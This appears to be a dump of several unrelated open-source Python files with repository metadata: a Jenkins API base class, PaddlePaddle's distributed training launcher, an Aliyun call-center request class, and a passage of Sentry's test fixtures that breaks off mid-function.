from jenkinsapi.custom_exceptions import JenkinsAPIException
class JenkinsBase(object):
"""
This appears to be the base object that all other jenkins objects are
inherited from
"""
RETRY_ATTEMPTS = 1
def __repr__(self):
return """<%s.%s %s>""" % (self.__class__.__module__,
self.__class__.__name__,
str(self))
def __str__(self):
raise NotImplementedError
def __init__(self, baseurl, poll=True):
"""
Initialize a jenkins connection
"""
self._data = None
self.baseurl = self.strip_trailing_slash(baseurl)
if poll:
self.poll()
def get_jenkins_obj(self):
raise NotImplementedError(
'Please implement this method on %s' % self.__class__.__name__)
def __eq__(self, other):
"""
Return true if the other object represents a connection to the
same server
"""
if not isinstance(other, self.__class__):
return False
if not other.baseurl == self.baseurl:
return False
return True
@classmethod
def strip_trailing_slash(cls, url):
while url.endswith('/'):
url = url[:-1]
return url
def poll(self, tree=None):
data = self._poll(tree=tree)
if 'jobs' in data:
data['jobs'] = self.resolve_job_folders(data['jobs'])
if not tree:
self._data = data
else:
return data
def _poll(self, tree=None):
url = self.python_api_url(self.baseurl)
return self.get_data(url, tree=tree)
def get_data(self, url, params=None, tree=None):
requester = self.get_jenkins_obj().requester
if tree:
if not params:
params = {'tree': tree}
else:
params.update({'tree': tree})
response = requester.get_url(url, params)
if response.status_code != 200:
logging.error('Failed request at %s with params: %s %s',
url, params, tree if tree else '')
response.raise_for_status()
try:
return ast.literal_eval(response.text)
except Exception:
logging.exception('Inappropriate content found at %s', url)
raise JenkinsAPIException('Cannot parse %s' % response.content)
def pprint(self):
"""
Print out all the data in this object for debugging.
"""
pprint.pprint(self._data)
def resolve_job_folders(self, jobs):
for job in list(jobs):
if 'color' not in job.keys():
jobs.remove(job)
jobs += self.process_job_folder(job)
return jobs
def process_job_folder(self, folder):
data = self.get_data(self.python_api_url(folder['url']))
result = []
for job in data.get('jobs', []):
if 'color' not in job.keys():
result += self.process_job_folder(job)
else:
result.append(job)
return result
@classmethod
def python_api_url(cls, url):
if url.endswith(config.JENKINS_API):
return url
else:
if url.endswith(r"/"):
fmt = "%s%s"
else:
fmt = "%s/%s"
return fmt % (url, config.JENKINS_API)
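# Illustrative subclass (not part of the original file): a minimal sketch of the contract the
# base class imposes -- concrete resources supply __str__ and get_jenkins_obj, and inherit
# polling, equality and URL helpers from JenkinsBase.
class _ExampleResource(JenkinsBase):
    """Hypothetical resource used only to demonstrate the JenkinsBase contract."""
    def __init__(self, baseurl, jenkins_obj):
        self._jenkins = jenkins_obj
        super(_ExampleResource, self).__init__(baseurl, poll=False)
    def __str__(self):
        return self.baseurl
    def get_jenkins_obj(self):
        return self._jenkins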
| 28.111111
| 75
| 0.554489
|
015d59b516e94ef0fe322fefda403b7bec7b1804
| 17,913
|
py
|
Python
|
python/paddle/distributed/fleet/launch.py
|
jiansowa/Paddle
|
488152a6d076eac91ef0921ff6e16c65777f814d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/distributed/fleet/launch.py
|
jiansowa/Paddle
|
488152a6d076eac91ef0921ff6e16c65777f814d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/distributed/fleet/launch.py
|
jiansowa/Paddle
|
488152a6d076eac91ef0921ff6e16c65777f814d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
fleetrun is a module that spawns multiple distributed
process on each training node for gpu training and cpu training.
Usage:
In both of single node training or multiple node training, this module
launch a process on each of the given gpu card or cpu machine.
GPU training:
1. for single node training with all visible gpu cards:
fleetrun your_training_py (arg1 arg2 and all others)
2. for single node training with [0,4) cards
fleetrun --gpus="0,1,2,3" your_training_py (arg1 arg2 and all others)
3. for multiple node training such as two node:192.168.0.16, 192.168.0.17
on 192.168.0.16:
fleetrun --ips="192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
on 192.168.0.17:
fleetrun --ips="192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
CPU training:
1. for single node training with multi servers and workers:
fleetrun --server_num=2 --worker_num=2 your_training_py (arg1 arg2 and all others)
2. for multiple node training such as two node:192.168.0.16, 192.168.0.17 \
with 2 servers and 4 workers.
on 192.168.0.16:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6170" \
--workers="192.168.0.16,192.168.0.17,192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
on 192.168.0.17:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6171" \
--workers="192.168.0.16,192.168.0.17,192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
3. use gloo backend for multiple node training such as two node:192.168.0.16, 192.168.0.17 \
with 2 servers and 4 workers. (workers should set port)
on 192.168.0.16:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6170" \
--workers="192.168.0.16:6171,192.168.0.17:6171,192.168.0.16:6172,192.168.0.17:6172" \
your_training_py (arg1 arg2 and all others)
on 192.168.0.17:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6170" \
--workers="192.168.0.16:6171,192.168.0.17:6171,192.168.0.16:6172,192.168.0.17:6172" \
your_training_py (arg1 arg2 and all others)
"""
from __future__ import print_function
import shutil
import sys
import tempfile
from sys import version
import subprocess
import os
import time
import six
import copy
from argparse import ArgumentParser, REMAINDER
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.launch_utils import *
import paddle.distributed.fleet.cloud_utils as cloud_utils
def _print_arguments(args):
print("----------- Configuration Arguments -----------")
for arg, value in sorted(six.iteritems(vars(args))):
print("%s: %s" % (arg, value))
print("------------------------------------------------")
def _parse_args():
"""
Helper function parsing the command line options
@retval ArgumentParser
"""
parser = ArgumentParser(
description='''start paddle training using multi-process mode.
see: http://www.paddlepaddle.org/documentation/docs/zh/1.6/user_guides/howto/training/cluster_howto.html#permalink-8--nccl2-
''')
# Optional arguments for the launch helper
parser.add_argument(
"--ips",
type=str,
default="127.0.0.1",
help="Paddle cluster nodes ips, such as 192.168.0.16,192.168.0.17..")
parser.add_argument(
"--gpus",
type=str,
default=None,
        help="For GPU training, the training processes will run on these GPUs; "
        "each process is bound to a single GPU. If not set, this module uses all available GPU cards for training."
)
parser.add_argument(
"--servers", type=str, default="", help="User defined servers ip:port")
parser.add_argument(
"--workers", type=str, default="", help="User defined workers ip:port")
parser.add_argument("--worker_num", type=int, help="number of workers")
parser.add_argument("--server_num", type=int, help="number of servers")
parser.add_argument(
"--log_dir",
type=str,
default="log",
        help="The path for each process's log. If not set, the log will be printed to the default pipe."
)
# positional
parser.add_argument(
"training_script",
type=str,
help="The full path to the single GPU training "
"program/script to be launched in parallel, "
"followed by all the arguments for the "
"training script")
# rest from the training program
parser.add_argument('training_script_args', nargs=REMAINDER)
return parser.parse_args()
def get_cluster_from_args(args, gpus):
node_ips = [x.strip() for x in args.ips.split(',')]
if len(node_ips) == 1:
node_ip = node_ips[0]
else:
_, node_ip = get_host_name_ip()
# node_ip = args.node_ip
assert node_ip in node_ips, "Can't find your local ip {%s} in node_ips: {%s}" \
% (node_ip, node_ips)
node_rank = node_ips.index(node_ip)
logger.debug("parsed from args: node_ips:{} node_ip:{} node_rank:{}".format(
node_ips, node_ip, node_rank))
free_ports = None
if not cloud_utils.use_paddlecloud() and len(
node_ips) <= 1 and os.environ.get('FLAGS_START_PORT') is None:
free_ports = find_free_ports(len(gpus))
if free_ports is not None:
free_ports = list(free_ports)
else:
start_port = 6070
if os.environ.get('FLAGS_START_PORT') is not None:
start_port = int(os.environ.get('FLAGS_START_PORT'))
free_ports = [x for x in range(start_port, start_port + len(gpus))]
trainer_endpoints = []
for ip in node_ips:
trainer_endpoints.append(["%s:%d" % (ip, port) for port in free_ports])
return get_cluster(node_ips, node_ip, trainer_endpoints, gpus)
def get_gpus(gpus):
if gpus is None:
gpus_num = fluid.core.get_cuda_device_count()
res_gpus = [str(x) for x in range(0, gpus_num)]
else:
cuda_visible_devices = os.getenv("CUDA_VISIBLE_DEVICES")
if cuda_visible_devices is None or cuda_visible_devices == "":
res_gpus = [x.strip() for x in gpus.split(',')]
else:
# change gpus into relative values
# e.g. CUDA_VISIBLE_DEVICES=4,5,6,7; args.gpus=4,5,6,7;
# therefore gpus=0,1,2,3
cuda_visible_devices_list = cuda_visible_devices.split(',')
for x in gpus.split(','):
assert x in cuda_visible_devices_list, "Can't find "\
"your gpus %s in CUDA_VISIBLE_DEVICES[%s]."\
% (x, cuda_visible_devices)
res_gpus = [
cuda_visible_devices_list.index(x.strip())
for x in gpus.split(',')
]
            logger.info("Change selected_gpus into relative values. --ips:{} "
"will change into relative_ips:{} according to your "
"CUDA_VISIBLE_DEVICES:{}".format(
gpus, res_gpus, cuda_visible_devices_list))
return res_gpus
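# Worked example of the relative-index mapping above (not part of the original file):
# with CUDA_VISIBLE_DEVICES="4,5,6,7" and --gpus="4,5", get_gpus returns [0, 1], i.e. the
# positions of the requested cards inside CUDA_VISIBLE_DEVICES rather than the physical ids.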
def launch_collective(args):
# parse arguments, used for cloud-single-machine and local
gpus = get_gpus(args.gpus)
trainers_num = cloud_utils.get_trainers_num()
    logger.debug("parsed from args trainers_num:{} gpus:{}".format(
trainers_num, gpus))
cluster = None
pod = None
start_port = 6170
if os.environ.get('FLAGS_START_PORT') is not None:
start_port = os.environ.get('FLAGS_START_PORT')
if cloud_utils.use_paddlecloud() and trainers_num != 1:
cluster, pod = cloud_utils.get_cloud_cluster(args.ips, gpus, start_port)
logger.debug("get cluster from cloud:{}".format(cluster))
else:
# trainers_num = 1 or not use paddlecloud ips="a,b"
cluster, pod = get_cluster_from_args(args, gpus)
logger.debug("get cluster from args:{}".format(cluster))
global_envs = copy.copy(os.environ.copy())
gloo_rendezvous_dir = tempfile.mkdtemp()
# add gloo env
global_envs["PADDLE_WITH_GLOO"] = "1"
global_envs["PADDLE_GLOO_RENDEZVOUS"] = "3"
global_envs["PADDLE_GLOO_FS_PATH"] = gloo_rendezvous_dir
procs = start_local_trainers(
cluster,
pod,
training_script=args.training_script,
training_script_args=args.training_script_args,
log_dir=args.log_dir,
envs=global_envs)
while True:
alive = watch_local_trainers(procs, cluster.trainers_nranks())
if not alive:
logger.info("Local processes completed.")
logger.debug("POD info:{}".format(pod))
break
time.sleep(3)
if os.path.exists(gloo_rendezvous_dir):
shutil.rmtree(gloo_rendezvous_dir)
def launch_ps(args):
ports = None
start_port = 6170
if args.server_num:
server_num = args.server_num
ports = get_ports(server_num, 0)
server_endpoints = ",".join(["127.0.0.1:" + str(x) for x in ports])
else:
        assert args.servers != "", "CPU mode requires either --server_num or --servers to be set."
server_endpoints = args.servers
server_endpoints_ips = [
x.strip().split(":")[0] for x in server_endpoints.split(",")
]
server_endpoints_port = [
x.strip().split(":")[1] for x in server_endpoints.split(",")
]
server_num = len(server_endpoints_ips)
if args.worker_num:
worker_num = args.worker_num
ports = get_ports(worker_num, server_num)
worker_endpoints = ",".join(["127.0.0.1:" + str(x) for x in ports])
else:
        assert args.workers != "", "CPU mode requires either --worker_num or --workers to be set."
worker_endpoints = args.workers
worker_endpoints_ips = [
x.strip().split(":")[0] for x in worker_endpoints.split(",")
]
worker_num = len(worker_endpoints_ips)
node_ips = list(set(server_endpoints_ips + worker_endpoints_ips))
worker_endpoints_len = [
len(x.strip().split(":")) for x in worker_endpoints.split(",")
]
if 1 in worker_endpoints_len:
# if no port value in worker_endpoints, will set default port values.
worker_endpoints_port = range(start_port + server_num,
start_port + server_num + worker_num, 1)
else:
worker_endpoints_port = [
x.strip().split(":")[1] for x in worker_endpoints.split(",")
]
# local train
if len(set(node_ips)) == 1:
current_node_ip = node_ips[0]
else:
_, current_node_ip = get_host_name_ip()
assert current_node_ip in node_ips, "Can't find your local ip {%s} in args.servers and args.workers ips: {%s}" \
% (current_node_ip, node_ips)
node_rank = node_ips.index(current_node_ip)
logger.debug(
"parsed from args: node_ips:{} current_node_ip:{} node_rank:{}, server_ports:{}".
format(node_ips, current_node_ip, node_rank, server_endpoints_port))
cluster = Cluster(hdfs=None)
server_rank = 0
worker_rank = 0
for node_rank, ip in enumerate(node_ips):
pod = Pod()
pod.rank = node_rank
pod.addr = ip
for i in range(len(server_endpoints_ips)):
if ip == server_endpoints_ips[i]:
server = Trainer()
server.endpoint = "%s:%s" % (ip, server_endpoints_port[i])
server.rank = server_rank
server_rank += 1
pod.servers.append(server)
for j in range(len(worker_endpoints_ips)):
if ip == worker_endpoints_ips[j]:
worker = Trainer()
                worker.endpoint = "%s:%s" % (ip, worker_endpoints_port[j])
worker.rank = worker_rank
worker_rank += 1
pod.workers.append(worker)
cluster.pods.append(pod)
pod_rank = node_ips.index(current_node_ip)
pod = cluster.pods[pod_rank]
default_env = os.environ.copy()
current_env = copy.copy(default_env)
gloo_rendezvous_dir = tempfile.mkdtemp()
# add gloo env
current_env["PADDLE_WITH_GLOO"] = "1"
current_env["PADDLE_GLOO_RENDEZVOUS"] = "3"
current_env["PADDLE_GLOO_FS_PATH"] = gloo_rendezvous_dir
current_env.pop("http_proxy", None)
current_env.pop("https_proxy", None)
procs = []
cmds = []
log_fns = []
for idx, cur_server in enumerate(pod.servers):
proc_env = {
"PADDLE_PSERVERS_IP_PORT_LIST": server_endpoints,
"PADDLE_TRAINER_ENDPOINTS": worker_endpoints,
"PADDLE_PORT": cur_server.endpoint.split(":")[1],
"TRAINING_ROLE": "PSERVER",
"PADDLE_TRAINERS_NUM": str(worker_num),
"POD_IP": cur_server.endpoint.split(":")[0]
}
current_env.update(proc_env)
cmd = [sys.executable, "-u", args.training_script
] + args.training_script_args
cmds.append(cmd)
if idx == 0:
logger.info(
"Local server start {} processes. First process distributed "
"environment info (Only For Debug): {}".format(
len(pod.servers),
pretty_print_envs(proc_env, ("Distributed Envs", "Value"))))
if args.log_dir is not None:
os.system("mkdir -p {}".format(args.log_dir))
fn = open("%s/serverlog.%d" % (args.log_dir, idx), "w")
log_fns.append(fn)
proc = subprocess.Popen(cmd, env=current_env, stdout=fn, stderr=fn)
else:
proc = subprocess.Popen(cmd, env=current_env)
tp = TrainerProc()
tp.proc = proc
tp.rank = cur_server.rank
tp.local_rank = idx
tp.log_fn = fn
tp.log_offset = fn.tell() if fn else None
tp.cmd = cmd
procs.append(tp)
for idx, cur_worker in enumerate(pod.workers):
proc_env = {
"PADDLE_PSERVERS_IP_PORT_LIST": server_endpoints,
"PADDLE_TRAINER_ENDPOINTS": worker_endpoints,
"PADDLE_TRAINERS_NUM": str(worker_num),
"TRAINING_ROLE": "TRAINER",
"PADDLE_TRAINER_ID": str(cur_worker.rank)
}
current_env.update(proc_env)
cmd = [sys.executable, "-u", args.training_script
] + args.training_script_args
cmds.append(cmd)
if idx == 0:
logger.info(
"Local worker start {} processes. First process distributed "
"environment info (Only For Debug): {}".format(
len(pod.workers),
pretty_print_envs(proc_env, ("Distributed Envs", "Value"))))
if args.log_dir is not None:
os.system("mkdir -p {}".format(args.log_dir))
fn = open("%s/workerlog.%d" % (args.log_dir, idx), "w")
log_fns.append(fn)
proc = subprocess.Popen(cmd, env=current_env, stdout=fn, stderr=fn)
else:
proc = subprocess.Popen(cmd, env=current_env)
tp = TrainerProc()
tp.proc = proc
tp.rank = cur_worker.rank
tp.local_rank = idx
tp.log_fn = fn
tp.log_offset = fn.tell() if fn else None
tp.cmd = cmd
procs.append(tp)
logger.info(
"Please check servers and workers logs in {}/workerlog.* and {}/serverlog.*".
format(args.log_dir, args.log_dir))
# only wait worker to finish here
for i, proc in enumerate(procs):
if i < len(pod.servers):
continue
procs[i].proc.wait()
if len(log_fns) > 0:
log_fns[i].close()
print("all workers exit, going to finish parameter server", file=sys.stderr)
for i in range(len(pod.servers)):
if len(log_fns) > 0:
log_fns[i].close()
procs[i].proc.terminate()
print("all parameter server are killed", file=sys.stderr)
if os.path.exists(gloo_rendezvous_dir):
shutil.rmtree(gloo_rendezvous_dir)
def launch():
args = _parse_args()
logger = get_logger()
_print_arguments(args)
ps_args = ['--worker_num', '--server_num', '--servers', '--workers']
collective_args = ['--ips', '--gpus']
has_ps_args = [
ps_arg for ps_arg in ps_args if ps_arg in " ".join(sys.argv[1:-1])
]
has_collective_args = [
co_arg for co_arg in collective_args
if co_arg in " ".join(sys.argv[1:-1])
]
if fluid.core.is_compiled_with_cuda():
cuda_device_num = fluid.core.get_cuda_device_count()
else:
cuda_device_num = 0
if len(has_ps_args) > 0 or cuda_device_num == 0:
        logger.info("Run parameter-server cpu mode. pserver arguments:{}".format(
has_ps_args))
launch_ps(args)
elif len(has_collective_args) > 0:
logger.info("Run collective gpu mode. gpu arguments:{}, cuda count:{}".
format(has_collective_args, cuda_device_num))
launch_collective(args)
else:
        logger.warning(
            "No distributed arguments found. Defaulting to GPU collective mode")
launch_collective(args)
if __name__ == "__main__":
launch()
| 37.39666
| 124
| 0.618713
|
911a936e1f61a8ce19e1396e0c088523cb65a74c
| 1,768
|
py
|
Python
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20200701/DeleteSkillGroupRequest.py
|
jorsonzen/aliyun-openapi-python-sdk
|
0afbfa8e5f9e19455695aa799f7dcc1cd853d827
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20200701/DeleteSkillGroupRequest.py
|
jorsonzen/aliyun-openapi-python-sdk
|
0afbfa8e5f9e19455695aa799f7dcc1cd853d827
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20200701/DeleteSkillGroupRequest.py
|
jorsonzen/aliyun-openapi-python-sdk
|
0afbfa8e5f9e19455695aa799f7dcc1cd853d827
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class DeleteSkillGroupRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2020-07-01', 'DeleteSkillGroup','CCC')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_SkillGroupId(self):
return self.get_query_params().get('SkillGroupId')
def set_SkillGroupId(self,SkillGroupId):
self.add_query_param('SkillGroupId',SkillGroupId)
def get_Force(self):
return self.get_query_params().get('Force')
def set_Force(self,Force):
self.add_query_param('Force',Force)
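# Illustrative usage (not part of the original file): a hedged sketch of sending this request
# with the core SDK client; the credentials, region and ids below are placeholders.
#     from aliyunsdkcore.client import AcsClient
#     client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-shanghai')
#     request = DeleteSkillGroupRequest()
#     request.set_InstanceId('<instance-id>')
#     request.set_SkillGroupId('<skill-group-id>')
#     response = client.do_action_with_exception(request)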
| 35.36
| 75
| 0.763575
|
988cfaaf5a73f32e56dd53617c00638401fb9a4c
| 26,620
|
py
|
Python
|
src/sentry/testutils/fixtures.py
|
ygnoh/sentry
|
e34653cac10b63e3c5c732a5c52eaa5bf3484d5b
|
[
"BSD-3-Clause"
] | null | null | null |
src/sentry/testutils/fixtures.py
|
ygnoh/sentry
|
e34653cac10b63e3c5c732a5c52eaa5bf3484d5b
|
[
"BSD-3-Clause"
] | null | null | null |
src/sentry/testutils/fixtures.py
|
ygnoh/sentry
|
e34653cac10b63e3c5c732a5c52eaa5bf3484d5b
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
sentry.testutils.fixtures
~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
import json
import os
import petname
import random
import six
import warnings
from django.db import IntegrityError, transaction
from django.utils import timezone
from django.utils.text import slugify
from exam import fixture
from hashlib import sha1
from loremipsum import Generator
from uuid import uuid4
from sentry.constants import SentryAppStatus
from sentry.mediators.sentry_apps import Creator as SentryAppCreator
from sentry.mediators.service_hooks import Creator as ServiceHookCreator
from sentry.models import (
Activity, Environment, Event, EventError, EventMapping, Group, Organization, OrganizationMember,
OrganizationMemberTeam, Project, Team, User, UserEmail, Release, Commit, ReleaseCommit,
CommitAuthor, Repository, CommitFileChange, ProjectDebugFile, File, UserPermission, EventAttachment
)
from sentry.utils.canonical import CanonicalKeyDict
loremipsum = Generator()
def make_sentence(words=None):
if words is None:
words = int(random.weibullvariate(8, 3))
return ' '.join(random.choice(loremipsum.words) for _ in range(words))
def make_word(words=None):
if words is None:
words = int(random.weibullvariate(8, 3))
return random.choice(loremipsum.words)
DEFAULT_EVENT_DATA = {
'extra': {
'loadavg': [0.97607421875, 0.88330078125, 0.833984375],
'sys.argv': [
'/Users/dcramer/.virtualenvs/sentry/bin/raven', 'test',
'https://ebc35f33e151401f9deac549978bda11:f3403f81e12e4c24942d505f086b2cad@sentry.io/1'
],
'user':
'dcramer'
},
'modules': {
'raven': '3.1.13'
},
'request': {
'cookies': {},
'data': {},
'env': {},
'headers': {},
'method': 'GET',
'query_string': '',
'url': 'http://example.com',
},
'stacktrace': {
'frames': [
{
'abs_path':
'www/src/sentry/models/foo.py',
'context_line':
' string_max_length=self.string_max_length)',
'filename':
'sentry/models/foo.py',
'function':
'build_msg',
'in_app':
True,
'lineno':
29,
'module':
'raven.base',
'post_context': [
' },', ' })', '',
" if 'stacktrace' in data:",
' if self.include_paths:'
],
'pre_context': [
'', ' data.update({',
" 'stacktrace': {",
" 'frames': get_stack_info(frames,",
' list_max_length=self.list_max_length,'
],
'vars': {
'culprit': 'raven.scripts.runner',
'date': 'datetime.datetime(2013, 2, 14, 20, 6, 33, 479471)',
'event_id': '598fb19363e745ec8be665e6ba88b1b2',
'event_type': 'raven.events.Message',
'frames': '<generator object iter_stack_frames at 0x103fef050>',
'handler': '<raven.events.Message object at 0x103feb710>',
'k': 'logentry',
'public_key': None,
'result': {
'logentry':
"{'message': 'This is a test message generated using ``raven test``', 'params': []}"
},
'self': '<raven.base.Client object at 0x104397f10>',
'stack': True,
'tags': None,
'time_spent': None,
},
},
{
'abs_path':
'/Users/dcramer/.virtualenvs/sentry/lib/python2.7/site-packages/raven/base.py',
'context_line':
' string_max_length=self.string_max_length)',
'filename':
'raven/base.py',
'function':
'build_msg',
'in_app':
False,
'lineno':
290,
'module':
'raven.base',
'post_context': [
' },', ' })', '',
" if 'stacktrace' in data:",
' if self.include_paths:'
],
'pre_context': [
'', ' data.update({',
" 'stacktrace': {",
" 'frames': get_stack_info(frames,",
' list_max_length=self.list_max_length,'
],
'vars': {
'culprit': 'raven.scripts.runner',
'date': 'datetime.datetime(2013, 2, 14, 20, 6, 33, 479471)',
'event_id': '598fb19363e745ec8be665e6ba88b1b2',
'event_type': 'raven.events.Message',
'frames': '<generator object iter_stack_frames at 0x103fef050>',
'handler': '<raven.events.Message object at 0x103feb710>',
'k': 'logentry',
'public_key': None,
'result': {
'logentry':
"{'message': 'This is a test message generated using ``raven test``', 'params': []}"
},
'self': '<raven.base.Client object at 0x104397f10>',
'stack': True,
'tags': None,
'time_spent': None,
},
},
],
},
'tags': [],
'platform': 'python',
}
class Fixtures(object):
@fixture
def projectkey(self):
return self.create_project_key(project=self.project)
@fixture
def user(self):
return self.create_user('admin@localhost', is_superuser=True)
@fixture
def organization(self):
        # XXX(dcramer): ensure that your org slug doesn't match your team slug
# and the same for your project slug
return self.create_organization(
name='baz',
slug='baz',
owner=self.user,
)
@fixture
def team(self):
team = self.create_team(
organization=self.organization,
name='foo',
slug='foo',
)
# XXX: handle legacy team fixture
queryset = OrganizationMember.objects.filter(
organization=self.organization,
)
for om in queryset:
OrganizationMemberTeam.objects.create(
team=team,
organizationmember=om,
is_active=True,
)
return team
@fixture
def project(self):
return self.create_project(
name='Bar',
slug='bar',
teams=[self.team],
)
@fixture
def environment(self):
return self.create_environment(
name='development',
project=self.project,
)
@fixture
def group(self):
return self.create_group(message=u'\u3053\u3093\u306b\u3061\u306f')
@fixture
def event(self):
return self.create_event(
event_id='a' * 32,
message=u'\u3053\u3093\u306b\u3061\u306f',
)
@fixture
def activity(self):
return Activity.objects.create(
group=self.group, project=self.project, type=Activity.NOTE, user=self.user, data={}
)
def create_organization(self, name=None, owner=None, **kwargs):
if not name:
name = petname.Generate(2, ' ', letters=10).title()
org = Organization.objects.create(name=name, **kwargs)
if owner:
self.create_member(
organization=org,
user=owner,
role='owner',
)
return org
def create_member(self, teams=None, **kwargs):
kwargs.setdefault('role', 'member')
om = OrganizationMember.objects.create(**kwargs)
if teams:
for team in teams:
self.create_team_membership(
team=team,
member=om,
)
return om
def create_team_membership(self, team, member=None, user=None):
if member is None:
member, _ = OrganizationMember.objects.get_or_create(
user=user,
organization=team.organization,
defaults={
'role': 'member',
}
)
return OrganizationMemberTeam.objects.create(
team=team,
organizationmember=member,
is_active=True,
)
def create_team(self, **kwargs):
if not kwargs.get('name'):
kwargs['name'] = petname.Generate(2, ' ', letters=10).title()
if not kwargs.get('slug'):
kwargs['slug'] = slugify(six.text_type(kwargs['name']))
if not kwargs.get('organization'):
kwargs['organization'] = self.organization
members = kwargs.pop('members', None)
team = Team.objects.create(**kwargs)
if members:
for user in members:
self.create_team_membership(team=team, user=user)
return team
def create_environment(self, **kwargs):
project = kwargs.get('project', self.project)
name = kwargs.get('name', petname.Generate(3, ' ', letters=10)[:64])
env = Environment.objects.create(
organization_id=project.organization_id,
project_id=project.id,
name=name,
)
env.add_project(project)
return env
def create_project(self, **kwargs):
teams = kwargs.pop('teams', None)
if teams is None:
teams = [self.team]
if not kwargs.get('name'):
kwargs['name'] = petname.Generate(2, ' ', letters=10).title()
if not kwargs.get('slug'):
kwargs['slug'] = slugify(six.text_type(kwargs['name']))
if not kwargs.get('organization'):
kwargs['organization'] = teams[0].organization
project = Project.objects.create(**kwargs)
for team in teams:
project.add_team(team)
return project
def create_project_key(self, project):
return project.key_set.get_or_create()[0]
# TODO(maxbittker) make new fixtures less hardcoded
def create_release(self, project, user=None, version=None):
if version is None:
version = os.urandom(20).encode('hex')
release = Release.objects.create(
version=version,
organization_id=project.organization_id,
)
release.add_project(project)
Activity.objects.create(
type=Activity.RELEASE,
project=project,
ident=Activity.get_version_ident(version),
user=user,
data={'version': version},
)
# add commits
if user:
author = self.create_commit_author(project, user)
repo = self.create_repo(project, name='organization-{}'.format(project.slug))
commit = self.create_commit(
project=project,
repo=repo,
author=author,
release=release,
key='deadbeef',
message='placeholder commit message',
)
release.update(
authors=[six.text_type(author.id)],
commit_count=1,
last_commit_id=commit.id,
)
return release
def create_repo(self, project, name=None):
repo = Repository.objects.create(
organization_id=project.organization_id,
name=name or '{}-{}'.format(petname.Generate(2, '',
letters=10), random.randint(1000, 9999)),
)
return repo
def create_commit(self, project, repo, author=None, release=None,
message=None, key=None, date_added=None):
commit = Commit.objects.get_or_create(
organization_id=project.organization_id,
repository_id=repo.id,
key=key or sha1(uuid4().hex).hexdigest(),
defaults={
'message': message or make_sentence(),
'author': author or self.create_commit_author(project),
'date_added': date_added or timezone.now(),
}
)[0]
if release:
ReleaseCommit.objects.create(
organization_id=project.organization_id,
project_id=project.id,
release=release,
commit=commit,
order=1,
)
self.create_commit_file_change(commit, project, '/models/foo.py')
self.create_commit_file_change(commit, project, '/worsematch/foo.py')
self.create_commit_file_change(commit, project, '/models/other.py')
return commit
def create_commit_author(self, project, user=None):
return CommitAuthor.objects.get_or_create(
organization_id=project.organization_id,
email=user.email if user else '{}@example.com'.format(make_word()),
defaults={
'name': user.name if user else make_word(),
}
)[0]
def create_commit_file_change(self, commit, project, filename):
commit_file_change = CommitFileChange.objects.get_or_create(
organization_id=project.organization_id,
commit=commit,
filename=filename,
type='M',
)
return commit_file_change
def create_user(self, email=None, **kwargs):
if email is None:
email = uuid4().hex + '@example.com'
kwargs.setdefault('username', email)
kwargs.setdefault('is_staff', True)
kwargs.setdefault('is_active', True)
kwargs.setdefault('is_superuser', False)
user = User(email=email, **kwargs)
if not kwargs.get('password'):
user.set_password('admin')
user.save()
# UserEmail is created by a signal
assert UserEmail.objects.filter(
user=user,
email=email,
).update(is_verified=True)
return user
def create_useremail(self, user, email, **kwargs):
if not email:
email = uuid4().hex + '@example.com'
kwargs.setdefault('is_verified', True)
useremail = UserEmail(user=user, email=email, **kwargs)
useremail.save()
return useremail
def create_event(self, event_id=None, **kwargs):
if event_id is None:
event_id = uuid4().hex
if 'group' not in kwargs:
kwargs['group'] = self.group
kwargs.setdefault('project', kwargs['group'].project)
